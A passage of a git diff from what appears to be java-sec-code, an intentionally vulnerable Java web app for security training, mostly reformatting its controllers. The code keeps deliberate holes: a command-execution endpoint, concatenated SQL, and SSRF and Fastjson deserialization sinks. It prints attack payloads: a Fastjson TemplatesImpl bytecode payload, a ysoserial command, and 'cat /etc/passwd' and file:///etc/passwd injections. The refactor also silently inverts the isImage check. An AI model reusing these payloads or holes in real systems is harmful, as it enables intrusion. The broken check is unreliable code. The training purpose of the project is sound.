@@ -11,7 +11,7 @@
 /**
  * Java 1.7/1.8 no CRLF vulns (test in Java 1.7/1.8)
  *
- * @author  JoyChou (joychou@joychou.org) @2018-01-03
+ * @author JoyChou (joychou@joychou.org) @2018-01-03
  */
 @Controller
 @RequestMapping("/crlf")
diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java
index 5481260e..21147270 100644
--- a/src/main/java/org/joychou/controller/CSRF.java
+++ b/src/main/java/org/joychou/controller/CSRF.java
@@ -10,7 +10,7 @@
  * check csrf using spring-security
  * Access http://localhost:8080/csrf/ -> click submit
  *
- * @author  JoyChou (joychou@joychou.org) @2019-05-31
+ * @author JoyChou (joychou@joychou.org) @2019-05-31
  */
 @Controller
 @RequestMapping("/csrf")
diff --git a/src/main/java/org/joychou/controller/CommandInject.java b/src/main/java/org/joychou/controller/CommandInject.java
index 5b63efcf..a1a99035 100644
--- a/src/main/java/org/joychou/controller/CommandInject.java
+++ b/src/main/java/org/joychou/controller/CommandInject.java
@@ -35,7 +35,6 @@ public String codeInject(String filepath) throws IOException {
      * Host Injection
      * Host: hacked by joychou;cat /etc/passwd
      * http://localhost:8080/codeinject/host
-     *
      */
     @GetMapping("/codeinject/host")
     public String codeInjectHost(HttpServletRequest request) throws IOException {
diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
index e498dfc6..fc346ef6 100644
--- a/src/main/java/org/joychou/controller/Cookies.java
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -5,8 +5,10 @@
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
+
 import org.joychou.util.WebUtils;
 import org.springframework.web.bind.annotation.RestController;
+
 import static org.springframework.web.util.WebUtils.getCookie;
 
 @RestController
@@ -43,7 +45,7 @@ public String vuln03(HttpServletRequest req) {
             for (Cookie cookie : cookies) {
                 // key code. Equals can also be equalsIgnoreCase.
                 if (NICK.equals(cookie.getName())) {
-                    nick =  cookie.getValue();
+                    nick = cookie.getValue();
                 }
             }
         }
@@ -58,7 +60,7 @@ public String vuln04(HttpServletRequest req) {
         if (cookies != null) {
             for (Cookie cookie : cookies) {
                 if (cookie.getName().equalsIgnoreCase(NICK)) {  // key code
-                    nick =  cookie.getValue();
+                    nick = cookie.getValue();
                 }
             }
         }
@@ -66,7 +68,6 @@ public String vuln04(HttpServletRequest req) {
     }
 
 
-
     @RequestMapping(value = "/vuln05")
     public String vuln05(@CookieValue("nick") String nick) {
         return "Cookie nick: " + nick;
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index 109a4e18..a18e6280 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -11,7 +11,7 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author  JoyChou (joychou@joychou.org) @2018.10.24
+ * @author JoyChou (joychou@joychou.org) @2018.10.24
  * https://github.com/JoyChou93/java-sec-code/wiki/CORS
  */
 
@@ -106,7 +106,7 @@ public String seccode(HttpServletRequest request, HttpServletResponse response)
 
         // 如果origin不为空并且origin不在白名单内，认定为不安全。
         // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求。
-        if ( origin != null && SecurityUtil.checkURL(origin) == null ) {
+        if (origin != null && SecurityUtil.checkURL(origin) == null) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index e3e0bca6..45662e9c 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -31,7 +31,7 @@ public class Deserialize {
     /**
      * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
      * Add the result to rememberMe cookie.
-     *
+     * <p>
      * http://localhost:8080/deserialize/rememberMe/vuln
      */
     @RequestMapping("/rememberMe/vuln")
@@ -40,7 +40,7 @@ public String rememberMeVul(HttpServletRequest request)
 
         Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
-        if (null == cookie){
+        if (null == cookie) {
             return "No rememberMe cookie. Right?";
         }
 
@@ -57,7 +57,7 @@ public String rememberMeVul(HttpServletRequest request)
 
     /**
      * Check deserialize class using black list.
-     *
+     * <p>
      * http://localhost:8080/deserialize/rememberMe/security
      */
     @RequestMapping("/rememberMe/security")
@@ -66,7 +66,7 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
 
         Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
 
-        if (null == cookie){
+        if (null == cookie) {
             return "No rememberMe cookie. Right?";
         }
         String rememberMe = cookie.getValue();
@@ -74,7 +74,7 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
 
         ByteArrayInputStream bytes = new ByteArrayInputStream(decoded);
 
-        try{
+        try {
             AntObjectInputStream in = new AntObjectInputStream(bytes);  // throw InvalidClassException
             in.readObject();
             in.close();
diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java
index 80d06fc9..6063b507 100644
--- a/src/main/java/org/joychou/controller/Fastjson.java
+++ b/src/main/java/org/joychou/controller/Fastjson.java
@@ -3,7 +3,6 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 import com.alibaba.fastjson.parser.Feature;
-import com.alibaba.fastjson.parser.ParserConfig;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -11,22 +10,19 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 
-
 @Controller
 @RequestMapping("/fastjson")
 public class Fastjson {
 
-    @RequestMapping(value = "/deserialize", method = {RequestMethod.POST })
+    @RequestMapping(value = "/deserialize", method = {RequestMethod.POST})
     @ResponseBody
     public static String Deserialize(@RequestBody String params) {
         // 如果Content-Type不设置application/json格式，post数据会被url编码
-        System.out.println(params);
         try {
             // 将post提交的string转换为json
             JSONObject ob = JSON.parseObject(params);
             return ob.get("name").toString();
-        }catch (Exception e){
-            e.printStackTrace();
+        } catch (Exception e) {
             return e.toString();
         }
     }
@@ -34,6 +30,6 @@ public static String Deserialize(@RequestBody String params) {
     public static void main(String[] args) {
         // Open calc in mac
         String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"yv66vgAAADEAOAoAAwAiBwA2BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQAzTG1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACgALBwAoAQAxbWUvbGlnaHRsZXNzL2Zhc3Rqc29uL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHW1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA9saWdodGxlc3MvcHduZXIBABFMbGlnaHRsZXNzL3B3bmVyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwA3AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAD8ADgAAACAAAwAAAAEADwA3AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAAEIADgAAACoABAAAAAEADwA3AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAABsAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAAAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}";
-        JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField);
+        JSON.parseObject(payload, Feature.SupportNonPublicField);
     }
 }
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index d7297539..8b7c7373 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -22,19 +22,17 @@
 
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.08.15
- * @desc    File upload
+ * File upload.
+ *
+ * @author JoyChou @ 2018-08-15
  */
-
 @Controller
 @RequestMapping("/file")
 public class FileUpload {
 
     // Save the uploaded file to this folder
     private static String UPLOADED_FOLDER = "/tmp/";
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
-    private final String mimeChars = "/abcdefghijklmnopqrstuvwxyz-.0123456789";
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     @GetMapping("/")
     public String index() {
@@ -77,7 +75,7 @@ public String singleFileUpload(@RequestParam("file") MultipartFile file,
     // only upload picture
     @PostMapping("/upload/picture")
     @ResponseBody
-    public String uploadPicture(@RequestParam("file") MultipartFile multifile) throws Exception{
+    public String uploadPicture(@RequestParam("file") MultipartFile multifile) throws Exception {
         if (multifile.isEmpty()) {
             return "Please select a file to upload";
         }
@@ -115,7 +113,7 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         };
         for (String blackMimeType : mimeTypeBlackList) {
             // 用contains是为了防止text/html;charset=UTF-8绕过
-            if (SecurityUtil.replaceSpecialStr(mimeType).toLowerCase().contains(blackMimeType) ) {
+            if (SecurityUtil.replaceSpecialStr(mimeType).toLowerCase().contains(blackMimeType)) {
                 logger.error("[-] Mime type error: " + mimeType);
                 deleteFile(excelFile);
                 return "Upload failed. Illeagl picture.";
@@ -125,7 +123,7 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         // 判断文件内容是否是图片 校验3
         boolean isImageFlag = isImage(excelFile);
 
-        if( !isImage(excelFile) ){
+        if (!isImageFlag) {
             logger.error("[-] File is not Image");
             deleteFile(excelFile);
             return "Upload failed. Illeagl picture.";
@@ -152,7 +150,10 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
     private void deleteFile(File... files) {
         for (File file : files) {
             if (file.exists()) {
-                file.delete();
+                boolean ret = file.delete();
+                if (ret) {
+                    logger.debug("File delete successfully!");
+                }
             }
         }
     }
@@ -160,9 +161,6 @@ private void deleteFile(File... files) {
     /**
      * 不建议使用transferTo，因为原始的MultipartFile会被覆盖
      * https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
-     *
-     * @param multiFile
-     * @return
      */
     private File convert(MultipartFile multiFile) throws Exception {
         String fileName = multiFile.getOriginalFilename();
@@ -170,7 +168,10 @@ private File convert(MultipartFile multiFile) throws Exception {
         UUID uuid = Generators.timeBasedGenerator().generate();
 
         File convFile = new File(UPLOADED_FOLDER + uuid + suffix);
-        convFile.createNewFile();
+        boolean ret = convFile.createNewFile();
+        if (!ret) {
+            return null;
+        }
         FileOutputStream fos = new FileOutputStream(convFile);
         fos.write(multiFile.getBytes());
         fos.close();
@@ -179,15 +180,9 @@ private File convert(MultipartFile multiFile) throws Exception {
 
     /**
      * Check if the file is a picture.
-     *
-     * @param file
-     * @return
      */
-    public static boolean isImage(File file) throws IOException {
+    private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
-        if (bi == null) {
-            return false;
-        }
-        return true;
+        return bi == null;
     }
 }
diff --git a/src/main/java/org/joychou/controller/GetRequestURI.java b/src/main/java/org/joychou/controller/GetRequestURI.java
index 512dc1ae..87405b62 100644
--- a/src/main/java/org/joychou/controller/GetRequestURI.java
+++ b/src/main/java/org/joychou/controller/GetRequestURI.java
@@ -13,13 +13,13 @@
 /**
  * The difference between getRequestURI and getServletPath.
  * 由于Spring Security的<code>antMatchers("/css/**", "/js/**")</code>未使用getRequestURI，所以登录不会被绕过。
- *
+ * <p>
  * Details: https://joychou.org/web/security-of-getRequestURI.html
- *
+ * <p>
  * Poc:
- *   http://localhost:8080/css/%2e%2e/exclued/vuln
- *   http://localhost:8080/css/..;/exclued/vuln
- *   http://localhost:8080/css/..;bypasswaf/exclued/vuln
+ * http://localhost:8080/css/%2e%2e/exclued/vuln
+ * http://localhost:8080/css/..;/exclued/vuln
+ * http://localhost:8080/css/..;bypasswaf/exclued/vuln
  *
  * @author JoyChou @2020-03-28
  */
@@ -28,7 +28,7 @@
 @RequestMapping("uri")
 public class GetRequestURI {
 
-    private final Logger logger= LoggerFactory.getLogger(this.getClass());
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     @RequestMapping(value = "/exclued/vuln")
     public String exclued(HttpServletRequest request) {
@@ -40,9 +40,9 @@ public String exclued(HttpServletRequest request) {
         logger.info("getRequestURI: " + uri);
         logger.info("getServletPath: " + request.getServletPath());
 
-        for (String path: excluedPath) {
-            if ( matcher.match (path, uri) ) {
-                 return "You have bypassed the login page.";
+        for (String path : excluedPath) {
+            if (matcher.match(path, uri)) {
+                return "You have bypassed the login page.";
             }
         }
         return "This is a login page >..<";
diff --git a/src/main/java/org/joychou/controller/IPForge.java b/src/main/java/org/joychou/controller/IPForge.java
index d3550e4f..9950e766 100644
--- a/src/main/java/org/joychou/controller/IPForge.java
+++ b/src/main/java/org/joychou/controller/IPForge.java
@@ -1,25 +1,23 @@
 package org.joychou.controller;
 
 import org.apache.commons.lang.StringUtils;
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2017.12.29
- * @desc    Java获取IP安全代码
- * @detail  关于获取IP不安全代码，详情可查看https://joychou.org/web/how-to-get-real-ip.html
+ * Java get real ip. More details: https://joychou.org/web/how-to-get-real-ip.html
+ *
+ * @author JoyChou @ 2017-12-29
  */
-
-@Controller
+@RestController
 @RequestMapping("/ip")
 public class IPForge {
+
     // no any proxy
     @RequestMapping("/noproxy")
-    @ResponseBody
     public static String noProxy(HttpServletRequest request) {
         return request.getRemoteAddr();
     }
@@ -36,7 +34,7 @@ public static String proxy(HttpServletRequest request) {
         String ip = request.getHeader("X-Real-IP");
         if (StringUtils.isNotBlank(ip)) {
             return ip;
-        }else {
+        } else {
             String remoteAddr = request.getRemoteAddr();
             if (StringUtils.isNotBlank(remoteAddr)) {
                 return remoteAddr;
diff --git a/src/main/java/org/joychou/controller/Jsonp.java b/src/main/java/org/joychou/controller/Jsonp.java
index 44394097..96061579 100644
--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -17,9 +17,8 @@
 import java.security.Principal;
 
 
-
 /**
- * @author  JoyChou (joychou@joychou.org) @ 2018.10.24
+ * @author JoyChou (joychou@joychou.org) @ 2018.10.24
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
@@ -75,14 +74,14 @@ public JSONObject advice(HttpServletRequest request) {
      * http://localhost:8080/jsonp/vuln/mappingJackson2JsonView?callback=test
      * Reference: https://p0sec.net/index.php/archives/122/ from p0
      * Affected version:  java-sec-code test case version: 4.3.6
-     *     - Spring Framework 5.0 to 5.0.6
-     *     - Spring Framework 4.1 to 4.3.17
+     * - Spring Framework 5.0 to 5.0.6
+     * - Spring Framework 4.1 to 4.3.17
      */
     @RequestMapping(value = "/vuln/mappingJackson2JsonView", produces = MediaType.APPLICATION_JSON_VALUE)
     public ModelAndView mappingJackson2JsonView(HttpServletRequest req) {
         ModelAndView view = new ModelAndView(new MappingJackson2JsonView());
         Principal principal = req.getUserPrincipal();
-        view.addObject("username", principal.getName() );
+        view.addObject("username", principal.getName());
         return view;
     }
 
@@ -109,5 +108,4 @@ public CsrfToken getCsrfToken(CsrfToken token) {
     }
 
 
-
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Login.java b/src/main/java/org/joychou/controller/Login.java
index 542f94e5..16769e4a 100644
--- a/src/main/java/org/joychou/controller/Login.java
+++ b/src/main/java/org/joychou/controller/Login.java
@@ -25,7 +25,7 @@ public String login() {
     }
 
     @GetMapping("/logout")
-    public String logoutPage (HttpServletRequest request, HttpServletResponse response) {
+    public String logoutPage(HttpServletRequest request, HttpServletResponse response) {
 
         String username = request.getUserPrincipal().getName();
 
diff --git a/src/main/java/org/joychou/controller/PathTraversal.java b/src/main/java/org/joychou/controller/PathTraversal.java
index 76f9a2ce..1976b01b 100644
--- a/src/main/java/org/joychou/controller/PathTraversal.java
+++ b/src/main/java/org/joychou/controller/PathTraversal.java
@@ -41,9 +41,9 @@ private String getImgBase64(String imgFile) throws IOException {
         logger.info("File path: " + imgFile);
 
         File f = new File(imgFile);
-        if(f.exists() && !f.isDirectory()) {
-            byte[] data = Files.readAllBytes( Paths.get(imgFile) );
-            return new String( Base64.encodeBase64(data) );
+        if (f.exists() && !f.isDirectory()) {
+            byte[] data = Files.readAllBytes(Paths.get(imgFile));
+            return new String(Base64.encodeBase64(data));
         } else {
             return "File doesn't exist or is not a file.";
         }
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index 983e3164..1bb1face 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,31 +1,27 @@
 package org.joychou.controller;
 
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.05.24
- * @desc    Java code execute
- * @fix     过滤造成命令执行的参数
+ * Java code execute
+ *
+ * @author JoyChou @ 2018-05-24
  */
-
-@Controller
+@RestController
 @RequestMapping("/rce")
 public class Rce {
 
     @RequestMapping("/exec")
     @ResponseBody
-    public String CommandExec(HttpServletRequest request) {
-        String cmd = request.getParameter("cmd").toString();
+    public String CommandExec(String cmd) {
         Runtime run = Runtime.getRuntime();
-        String lineStr = "";
+        StringBuilder sb = new StringBuilder();
 
         try {
             Process p = run.exec(cmd);
@@ -34,22 +30,20 @@ public String CommandExec(HttpServletRequest request) {
             String tmpStr;
 
             while ((tmpStr = inBr.readLine()) != null) {
-                lineStr += tmpStr + "\n";
-                System.out.println(tmpStr);
+                sb.append(tmpStr);
             }
 
             if (p.waitFor() != 0) {
                 if (p.exitValue() == 1)
-                    return "command exec failed";
+                    return "Command exec failed!!";
             }
 
             inBr.close();
             in.close();
         } catch (Exception e) {
-            e.printStackTrace();
             return "Except";
         }
-        return lineStr;
+        return sb.toString();
     }
 }
 
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index cf49a335..7ea518a5 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -16,7 +16,8 @@
 
 /**
  * SQL Injection
- * @author  JoyChou @2018.08.22
+ *
+ * @author JoyChou @2018.08.22
  */
 
 @SuppressWarnings("Duplicates")
@@ -47,39 +48,40 @@ public class SQLI {
      * @param username username
      */
     @RequestMapping("/jdbc/vuln")
-    public String jdbc_sqli_vul(@RequestParam("username") String username){
-        String result = "";
+    public String jdbc_sqli_vul(@RequestParam("username") String username) {
+
+        StringBuilder result = new StringBuilder();
+
         try {
             Class.forName(driver);
             Connection con = DriverManager.getConnection(url, user, password);
 
-            if(!con.isClosed())
-                System.out.println("Connecting to Database successfully.");
+            if (!con.isClosed())
+                System.out.println("Connect to database successfully.");
 
             // sqli vuln code
-             Statement statement = con.createStatement();
-             String sql = "select * from users where username = '" + username + "'";
-             logger.info(sql);
-             ResultSet rs = statement.executeQuery(sql);
+            Statement statement = con.createStatement();
+            String sql = "select * from users where username = '" + username + "'";
+            logger.info(sql);
+            ResultSet rs = statement.executeQuery(sql);
 
-            while(rs.next()){
+            while (rs.next()) {
                 String res_name = rs.getString("username");
                 String res_pwd = rs.getString("password");
-                result +=  res_name + ": " + res_pwd + "\n";
-                logger.info(res_name + ": " + res_pwd);
+                String info = String.format("%s: %s\n", res_name, res_pwd);
+                result.append(info);
+                logger.info(info);
             }
             rs.close();
             con.close();
 
 
-        }catch (ClassNotFoundException e) {
+        } catch (ClassNotFoundException e) {
             logger.error("Sorry,can`t find the Driver!");
-        }catch (SQLException e) {
-            logger.error(e.toString());
-        }catch (Exception e) {
+        } catch (SQLException e) {
             logger.error(e.toString());
         }
-        return result;
+        return result.toString();
     }
 
 
@@ -90,42 +92,42 @@ public String jdbc_sqli_vul(@RequestParam("username") String username){
      * @param username username
      */
     @RequestMapping("/jdbc/sec")
-    public String jdbc_sqli_sec(@RequestParam("username") String username){
+    public String jdbc_sqli_sec(@RequestParam("username") String username) {
 
-        String result = "";
+        StringBuilder result = new StringBuilder();
         try {
             Class.forName(driver);
             Connection con = DriverManager.getConnection(url, user, password);
 
-            if(!con.isClosed())
+            if (!con.isClosed())
                 System.out.println("Connecting to Database successfully.");
 
             // fix code
             String sql = "select * from users where username = ?";
             PreparedStatement st = con.prepareStatement(sql);
             st.setString(1, username);
+
             logger.info(st.toString());  // sql after prepare statement
             ResultSet rs = st.executeQuery();
 
-            while(rs.next()){
+            while (rs.next()) {
                 String res_name = rs.getString("username");
                 String res_pwd = rs.getString("password");
-                result +=  res_name + ": " + res_pwd + "\n";
-                logger.info(res_name + ": " + res_pwd);
+                String info = String.format("%s: %s\n", res_name, res_pwd);
+                result.append(info);
+                logger.info(info);
             }
 
             rs.close();
             con.close();
 
-        }catch (ClassNotFoundException e) {
-            logger.error("Sorry,can`t find the Driver!");
+        } catch (ClassNotFoundException e) {
+            logger.error("Sorry, can`t find the Driver!");
             e.printStackTrace();
-        }catch (SQLException e) {
-            logger.error(e.toString());
-        }catch (Exception e) {
+        } catch (SQLException e) {
             logger.error(e.toString());
         }
-        return result;
+        return result.toString();
     }
 
     /**
@@ -169,7 +171,6 @@ public User mybatisSec01(@RequestParam("username") String username) {
     }
 
     /**
-     * security code
      * http://localhost:8080/sqli/mybatis/sec02?id=1
      *
      * @param id id
@@ -181,9 +182,8 @@ public User mybatisSec02(@RequestParam("id") Integer id) {
 
 
     /**
-     * security code
      * http://localhost:8080/sqli/mybatis/sec03
-     **/
+     */
     @GetMapping("/mybatis/sec03")
     public User mybatisSec03() {
         return userMapper.OrderByUsername();
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 5b74049e..e9c30d0e 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -1,6 +1,5 @@
 package org.joychou.controller;
 
-import com.google.common.io.Files;
 import com.squareup.okhttp.OkHttpClient;
 import org.apache.commons.httpclient.HttpClient;
 import org.apache.commons.httpclient.methods.GetMethod;
@@ -12,6 +11,7 @@
 import org.apache.http.impl.client.CloseableHttpClient;
 import org.apache.http.impl.client.HttpClients;
 import org.joychou.security.SecurityUtil;
+import org.joychou.util.WebUtils;
 import org.jsoup.Jsoup;
 import org.jsoup.nodes.Document;
 import org.slf4j.Logger;
@@ -41,8 +41,7 @@ public class SSRF {
     private static Logger logger = LoggerFactory.getLogger(SSRF.class);
 
     @RequestMapping("/urlConnection")
-    public static String ssrf_URLConnection(@RequestParam String url)
-    {
+    public static String ssrf_URLConnection(@RequestParam String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
@@ -55,7 +54,7 @@ public static String ssrf_URLConnection(@RequestParam String url)
             }
             in.close();
             return html.toString();
-        }catch(Exception e) {
+        } catch (Exception e) {
             logger.error(e.toString());
             return "fail";
         }
@@ -64,12 +63,11 @@ public static String ssrf_URLConnection(@RequestParam String url)
 
     @RequestMapping("/HttpURLConnection")
     @ResponseBody
-    public static String ssrf_httpURLConnection(@RequestParam String url)
-    {
+    public static String ssrf_httpURLConnection(@RequestParam String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
-            HttpURLConnection httpUrl = (HttpURLConnection)urlConnection;
+            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
             BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
             String inputLine;
             StringBuilder html = new StringBuilder();
@@ -79,7 +77,7 @@ public static String ssrf_httpURLConnection(@RequestParam String url)
             }
             in.close();
             return html.toString();
-        }catch(Exception e) {
+        } catch (Exception e) {
             logger.error(e.toString());
             return "fail";
         }
@@ -88,11 +86,10 @@ public static String ssrf_httpURLConnection(@RequestParam String url)
 
     @RequestMapping("/Request")
     @ResponseBody
-    public static String ssrf_Request(@RequestParam String url)
-    {
+    public static String ssrf_Request(@RequestParam String url) {
         try {
             return Request.Get(url).execute().returnContent().toString();
-        }catch(Exception e) {
+        } catch (Exception e) {
             logger.error(e.toString());
             return "fail";
         }
@@ -102,18 +99,18 @@ public static String ssrf_Request(@RequestParam String url)
     /**
      * Download the url file.
      * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd
-     *
+     * <p>
      * new URL(String url).openConnection()
      * new URL(String url).openStream()
      * new URL(String url).getContent()
      */
     @RequestMapping("/openStream")
     @ResponseBody
-    public static void ssrf_openStream (@RequestParam String url, HttpServletResponse response) throws IOException {
+    public static void ssrf_openStream(@RequestParam String url, HttpServletResponse response) throws IOException {
         InputStream inputStream = null;
         OutputStream outputStream = null;
         try {
-            String downLoadImgFileName = Files.getNameWithoutExtension(url) + "." + Files.getFileExtension(url);
+            String downLoadImgFileName = WebUtils.getNameWithoutExtension(url) + "." + WebUtils.getFileExtension(url);
             // download
             response.setHeader("content-disposition", "attachment;fileName=" + downLoadImgFileName);
 
@@ -126,16 +123,15 @@ public static void ssrf_openStream (@RequestParam String url, HttpServletRespons
                 outputStream.write(bytes, 0, length);
             }
 
-        }catch (Exception e) {
+        } catch (Exception e) {
             logger.error(e.toString());
-        }finally {
+        } finally {
             if (inputStream != null) {
                 inputStream.close();
             }
             if (outputStream != null) {
                 outputStream.close();
             }
-
         }
     }
 
@@ -162,36 +158,41 @@ public static void ssrf_okhttp(@RequestParam String url) throws IOException {
 
 
     /**
-     * http://localhost:8080/ssrf/HttpClient?url=http://www.baidu.com
+     * http://localhost:8080/ssrf/HttpClient/sec?url=http://www.baidu.com
      *
      * @return The response of url param.
      */
-    @RequestMapping("/HttpClient")
+    @RequestMapping("/HttpClient/sec")
     @ResponseBody
     public static String ssrf_HttpClient(@RequestParam String url) {
-        CloseableHttpClient client = HttpClients.createDefault();
-        HttpGet httpGet = new HttpGet(url);
+        StringBuilder result = new StringBuilder();
         try {
+            SecurityUtil.startSSRFHook();
